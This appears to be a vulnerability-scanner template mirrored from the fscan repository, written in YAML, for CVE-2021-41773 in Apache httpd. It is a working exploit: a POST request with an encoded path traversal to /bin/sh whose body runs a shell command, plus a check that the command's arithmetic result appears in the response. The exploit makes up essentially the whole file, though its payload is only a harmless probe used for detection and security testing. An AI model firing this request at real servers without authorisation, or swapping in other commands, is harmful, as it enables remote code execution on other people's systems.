mirror of https://github.com/qwqdanchun/fscan.git
15 lines
478 B
YAML
15 lines
478 B
YAML
name: poc-yaml-apache-httpd-cve-2021-41773-rce
|
|
set:
|
|
r1: randomInt(800000000, 1000000000)
|
|
r2: randomInt(800000000, 1000000000)
|
|
rules:
|
|
- method: POST
|
|
path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
|
|
body: echo;expr {{r1}} + {{r2}}
|
|
expression: |
|
|
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
|
|
detail:
|
|
author: B1anda0(https://github.com/B1anda0)
|
|
links:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|